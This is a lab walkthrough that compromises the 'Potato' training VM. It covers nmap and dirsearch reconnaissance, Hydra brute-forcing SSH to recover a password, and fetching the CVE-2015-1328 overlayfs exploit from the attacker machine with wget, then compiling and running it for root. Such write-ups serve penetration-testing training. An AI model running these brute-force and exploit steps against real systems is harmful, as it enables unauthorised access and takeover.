Information Gathering

Note: simply import the OVA directly into VMware.

  • First, check the Kali IP address:
root at kali in ~ 
$ ip --color address
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:36:e9:5d brd ff:ff:ff:ff:ff:ff
inet 10.10.8.17/24 brd 10.10.8.255 scope global dynamic noprefixroute eth0
valid_lft 1717sec preferred_lft 1717sec
inet6 fe80::fff8:80c4:4cdf:a014/64 scope link noprefixroute
valid_lft forever preferred_lft forever

Host Discovery

  • Nmap finds one candidate IP: 10.10.8.15. Of the five hosts up, 10.10.8.1, .2 and .254 carry VMware's 00:50:56 OUI (on a VMware NAT network these are normally the host's virtual adapter, the NAT gateway and the DHCP server) and 10.10.8.17 is Kali itself, so the only other guest is 10.10.8.15:
root at kali in ~/Potato-Suncsr 
$ nmap -sn --min-rate 10000 10.10.8.0/24 -oN nmap_ip.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-14 10:12 CST
Nmap scan report for 10.10.8.1
Host is up (0.000082s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.8.2
Host is up (0.000072s latency).
MAC Address: 00:50:56:EA:61:D3 (VMware)
Nmap scan report for 10.10.8.15
Host is up (0.000046s latency).
MAC Address: 00:0C:29:FD:5A:29 (VMware)
Nmap scan report for 10.10.8.254
Host is up (0.000024s latency).
MAC Address: 00:50:56:E7:3A:52 (VMware)
Nmap scan report for 10.10.8.17
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 14.41 seconds
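Picking the target out of five hosts by eye is easy; on a busier /24 a small filter over the -oN file saves time. The script below is an added example, not part of the original writeup: it parses nmap's normal-output format (the sample input is the report above, inlined) and keeps the hosts that carry VMware's auto-generated guest OUI 00:0C:29 while dropping our own address, which nmap lists without a MAC line. The OUI rule is a lab-specific heuristic and an assumption of this example; on a network where the target is not a VMware guest it would filter the wrong thing.

```shell
#!/bin/sh
# Added example (not from the original writeup): triage an `nmap -sn -oN`
# report so the target stands out from VMware's own infrastructure hosts.
# Constructed sample input: the nmap_ip.txt report shown above, inlined.
# Heuristic assumption: 00:0C:29 is VMware's auto-generated guest OUI, while
# the 00:50:56 addresses (.1/.2/.254 here) belong to the host adapter, NAT
# gateway and DHCP server; the scanning host is listed by nmap without a MAC.

NMAP_SN_SAMPLE='Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-14 10:12 CST
Nmap scan report for 10.10.8.1
Host is up (0.000082s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.8.2
Host is up (0.000072s latency).
MAC Address: 00:50:56:EA:61:D3 (VMware)
Nmap scan report for 10.10.8.15
Host is up (0.000046s latency).
MAC Address: 00:0C:29:FD:5A:29 (VMware)
Nmap scan report for 10.10.8.254
Host is up (0.000024s latency).
MAC Address: 00:50:56:E7:3A:52 (VMware)
Nmap scan report for 10.10.8.17
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 14.41 seconds'

# live_hosts [FILE...]: print "ip mac" for every host reported up, with "-"
# as the MAC when nmap printed none (our own interface). Reads stdin if no file.
live_hosts() {
    awk '
        function flush() { if (up) print ip, mac; up = 0 }
        /^Nmap scan report for/ { flush(); ip = $NF; gsub(/[()]/, "", ip); mac = "-" }
        /^Host is up/           { up = 1 }
        /^MAC Address:/         { mac = $3 }
        END                     { flush() }
    ' "$@"
}

# candidate_targets OWN_IP [FILE...]: keep hosts whose MAC has the VMware
# guest OUI and drop our own address.
candidate_targets() {
    own_ip=${1:?usage: candidate_targets OWN_IP [FILE...]}
    shift
    live_hosts "$@" | awk -v me="$own_ip" 'toupper($2) ~ /^00:0C:29/ && $1 != me { print $1 }'
}

# Stand-alone run against the inlined sample: prints 10.10.8.15
printf '%s\n' "$NMAP_SN_SAMPLE" | candidate_targets 10.10.8.17
```

Pass the saved report as a file argument (`candidate_targets 10.10.8.17 nmap_ip.txt`) to run it against a real scan instead of the inlined sample.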

Port Scanning

  • Scan all TCP ports for open services (default scripts run against whatever is found):
root at kali in ~/Potato-Suncsr 
$ nmap -p- -sC -T4 --min-rate 10000 10.10.8.15 -oN nmap_port.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-14 10:13 CST
Nmap scan report for 10.10.8.15
Host is up (0.000034s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
|_http-title: Potato
7120/tcp open unknown
MAC Address: 00:0C:29:FD:5A:29 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.13 seconds

Service Identification

  • Fingerprint the services on the two open ports. Note that -A already implies -sV, -O, -sC and --traceroute, so listing them separately is redundant but harmless:
root at kali in ~/Potato-Suncsr 
$ nmap -p80,7120 -sV -O -A -sC -T4 --min-rate 10000 10.10.8.15 -oN nmap_server.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-14 10:14 CST
Nmap scan report for 10.10.8.15
Host is up (0.00062s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Potato
|_http-server-header: Apache/2.4.7 (Ubuntu)
7120/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 b1:a8:49:bc:75:01:97:10:da:6a:fa:79:2f:12:41:30 (DSA)
| 2048 0d:6c:93:2a:1b:6c:10:bb:d4:01:4d:9c:42:34:36:df (RSA)
| 256 fc:96:d8:e5:a7:aa:d2:46:9b:00:bd:f2:be:45:cf:b5 (ECDSA)
|_ 256 e3:b0:57:45:d3:83:44:45:af:3a:99:94:f8:25:a4:6c (ED25519)
MAC Address: 00:0C:29:FD:5A:29 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.62 ms 10.10.8.15

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.87 seconds

Vulnerability Scanning

  • Run Nmap's vuln script category against the target:
root at kali in ~/Potato-Suncsr 
$ nmap --script=vuln -T4 --min-rate 10000 10.10.8.15 -oN nmap_vuln.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-14 10:14 CST
Nmap scan report for 10.10.8.15
Host is up (0.000069s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_ /info.php: Possible information file
MAC Address: 00:0C:29:FD:5A:29 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 320.79 seconds
  • Nothing in these results gives a foothold: the Slowloris finding is only a denial-of-service condition, and /info.php is just an information file. Note also that without -p this scan covered only the default top 1000 ports ("Not shown: 999 closed tcp ports"), so port 7120 was not checked here.

Directory Brute-Forcing

root at kali in ~/Potato-Suncsr 
$ dirsearch -u http://10.10.8.15 -o $PWD/dirsearch.txt

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/Potato-Suncsr/dirsearch.txt
Error Log: /root/Potato-Suncsr/.dirsearch/logs/errors-24-06-14_10-17-13.log
Target: http://10.10.8.15/

[10:17:13] Starting:
[10:17:14] 403 - 288B - /.ht_wsr.txt
[10:17:14] 403 - 291B - /.htaccess.bak1
[10:17:14] 403 - 292B - /.htaccess_extra
[10:17:14] 403 - 293B - /.htaccess.sample
......

root at kali in ~/Potato-Suncsr
$ cat dirsearch.txt | grep 200
200 654B http://10.10.8.15:80/index.html
200 86KB http://10.10.8.15:80/info.php

Exploitation

  • Visiting each discovered path in turn: this is clearly a custom-built site:

[screenshot: image-20240614102508351]

  • There is an info.php page:

[screenshot: image-20240614102537976]

  • It is a phpinfo() page: at most an information disclosure (PHP version, loaded modules, filesystem paths, environment), not something exploitable on its own.

SSH Brute-Force

  • Port 80 offers nothing exploitable for the moment, but the port scan also showed SSH on port 7120, so try brute-forcing it with Hydra:

Note: judging from the index.html page, potato (or Potato) is a natural username to try for the brute-force.

hydra -l potato -P /usr/share/wordlists/rockyou.txt -V ssh://10.10.8.15:7120
  • The brute-force result gives the credentials potato/letmein.

[screenshot: image-20240614104800159]

  • Log in with the recovered credentials:
root at kali in ~/Potato-Suncsr 
$ ssh potato@10.10.8.15 -p 7120
potato@10.10.8.15's password:
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)

* Documentation: https://help.ubuntu.com/
Last login: Tue Sep 8 02:04:57 2020 from 192.168.17.172
potato@ubuntu:~$ id
uid=1000(potato) gid=1000(potato) groups=1000(potato),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)

Host Enumeration

  • List the accounts with a login shell (this only catches /bin/bash; accounts using another shell such as /bin/sh would be missed):
potato@ubuntu:~$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
potato:x:1000:1000:Potato,,,:/home/potato:/bin/bash
  • Look at potato's home directory:
potato@ubuntu:~$ ls -aRl /home/potato
/home/potato:
total 28
drwxr-xr-x 3 potato potato 4096 Sep 8 2020 .
drwxr-xr-x 3 root root 4096 Sep 7 2020 ..
-rw------- 1 potato potato 3 Sep 8 2020 .bash_history
-rw-r--r-- 1 potato potato 220 Sep 7 2020 .bash_logout
-rw-r--r-- 1 potato potato 3637 Sep 7 2020 .bashrc
drwx------ 2 potato potato 4096 Sep 7 2020 .cache
-rw-r--r-- 1 potato potato 675 Sep 7 2020 .profile

/home/potato/.cache:
total 8
drwx------ 2 potato potato 4096 Sep 7 2020 .
drwxr-xr-x 3 potato potato 4096 Sep 8 2020 ..
-rw-r--r-- 1 potato potato 0 Sep 7 2020 motd.legal-displayed
  • Look for SUID binaries:
potato@ubuntu:~$ find / -perm -4000 2>/dev/null
/bin/umount
/bin/fusermount
/bin/mount
/bin/su
/usr/sbin/pppd
/usr/sbin/uuidd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/mtr
/usr/bin/chfn
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
  • Nothing here stands out: the SUID list is the stock distribution set and the home directory is empty. One thing from the earlier id output is worth noting, though: potato is a member of group 27(sudo) and the password is already known, so running sudo -l would be the cheapest thing to check before reaching for a kernel exploit.

Kernel Privilege Escalation

  • With nothing else to go on, fall back on the big hammer. First check whether the target has a gcc compiler:
potato@ubuntu:~$ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.8/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 4.8.4-2ubuntu1~14.04.4' --......
Thread model: posix
gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.4)
  • Check the kernel and distribution version:
potato@ubuntu:~$ uname -a
Linux ubuntu 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

potato@ubuntu:~$ cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04 LTS"
NAME="Ubuntu"
VERSION="14.04, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
  • On Kali, use searchsploit to look for exploits matching this kernel/distribution version:

[screenshot: image-20240614112155636]

  • Pick the first result, 37292.c, and copy it into the working directory:
root at kali in ~/Potato-Suncsr 
$ searchsploit -m 37292.c
Exploit: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/37292
Path: /usr/share/exploitdb/exploits/linux/local/37292.c
Codes: CVE-2015-1328
Verified: True
File Type: C source, ASCII text, with very long lines (466)
Copied to: /root/Potato-Suncsr/37292.c

root at kali in ~/Potato-Suncsr
$ ls
37292.c nmap_ip.txt nmap_port.txt nmap_server.txt nmap_vuln.txt
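Before spending time on upload and compilation, it is worth confirming on the target that the exploit's preconditions hold. The script below is an added pre-flight check, not part of the original writeup or of 37292.c: the version range is the one in the searchsploit title (3.13.0 up to but not including 3.19); the overlayfs module name it looks for and the unprivileged_userns_clone sysctl (treated as "not restricted" when the file is absent, as on older kernels that lack the knob) are assumptions about the target; and it does not attempt the exploit itself.

```shell
#!/bin/sh
# Added pre-flight check (not part of the original writeup or of 37292.c).
# Confirms on the target that what the overlayfs exploit relies on is present:
# a kernel in the advertised range, overlayfs, unprivileged user namespaces
# and a compiler. Assumptions: module name overlay*/overlayfs, and an absent
# unprivileged_userns_clone sysctl meaning "not restricted".

# kernel_in_range RELEASE: succeed when 3.13 <= kernel < 3.19, the range from
# the 37292 title. "3.13.0-24-generic" -> major 3, minor 13.
kernel_in_range() {
    ver=${1%%-*}          # drop "-24-generic"
    major=${ver%%.*}
    rest=${ver#*.}
    minor=${rest%%.*}
    [ "$major" -eq 3 ] && [ "$minor" -ge 13 ] && [ "$minor" -le 18 ]
}

# overlayfs_available: already registered, or shipped as a module for the
# running kernel (the exploit's mount() can trigger module autoloading).
overlayfs_available() {
    grep -qE '[[:space:]]overlay(fs)?$' /proc/filesystems 2>/dev/null && return 0
    find "/lib/modules/$(uname -r)" -name 'overlay*.ko*' 2>/dev/null | grep -q .
}

# userns_allowed: the exploit needs CLONE_NEWUSER as an unprivileged user.
# Assumption: no sysctl file means the kernel has no such restriction knob.
userns_allowed() {
    knob=/proc/sys/kernel/unprivileged_userns_clone
    [ ! -e "$knob" ] || [ "$(cat "$knob")" = 1 ]
}

# precheck: print one line per precondition; nothing here is exploitative.
precheck() {
    rel=$(uname -r)
    if kernel_in_range "$rel"; then
        echo "[+] kernel $rel is inside the 3.13-3.18 range 37292.c targets"
    else
        echo "[-] kernel $rel is outside the range 37292.c targets"
    fi
    if overlayfs_available; then echo "[+] overlayfs present"; else echo "[-] overlayfs not found"; fi
    if userns_allowed; then
        echo "[+] unprivileged user namespaces not disabled by sysctl"
    else
        echo "[-] unprivileged_userns_clone=0, the exploit's CLONE_NEWUSER will fail"
    fi
    if command -v gcc >/dev/null 2>&1; then
        echo "[+] gcc available: $(gcc -dumpversion)"
    else
        echo "[-] no gcc on target; compile elsewhere against a matching libc"
    fi
}

precheck
```

Run it on the target after logging in as potato; a kernel of 3.13.0-24-generic with gcc 4.8.4 present, as shown above, should report all four checks as satisfied.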
  • The 37292.c source has to be transferred to the target and compiled there, so start a simple Python web server on Kali:
root at kali in ~/Potato-Suncsr 
$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

  • On the target, fetch the file with wget:
potato@ubuntu:~$ wget http://10.10.8.17/37292.c
--2024-06-13 20:26:54-- http://10.10.8.17/37292.c
Connecting to 10.10.8.17:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: ‘37292.c’

100%[===============================================>] 4,968 --.-K/s in 0s

2024-06-13 20:26:54 (936 MB/s) - ‘37292.c’ saved [4968/4968]

potato@ubuntu:~$ ls -l 37292.c
-rw-rw-r-- 1 potato potato 4968 Jun 13 20:22 37292.c
  • Compile 37292.c with gcc:
potato@ubuntu:~$ gcc 37292.c -o exp
potato@ubuntu:~$ ls -l exp
-rwxrwxr-x 1 potato potato 13652 Jun 13 20:29 exp
  • Run the exploit. The messages about /etc/ld.so.preload and a shared library are its mechanism: CVE-2015-1328 let an unprivileged user inside a user namespace create files through an overlayfs mount without the normal permission check, and the exploit uses that to plant a preload library that the dynamic loader picks up in a privileged process, yielding a root shell. Those two artifacts are also what a defender would look for afterwards:
potato@ubuntu:~$ id
uid=1000(potato) gid=1000(potato) groups=1000(potato),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)
potato@ubuntu:~$ ./exp
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare),1000(potato)
  • Root obtained; grab the flag:
# cd /root
# ls
proof.txt
# cat proof.txt
SunCSR.Team.Potato.af6d45da1f1181347b9e2139f23c6a5b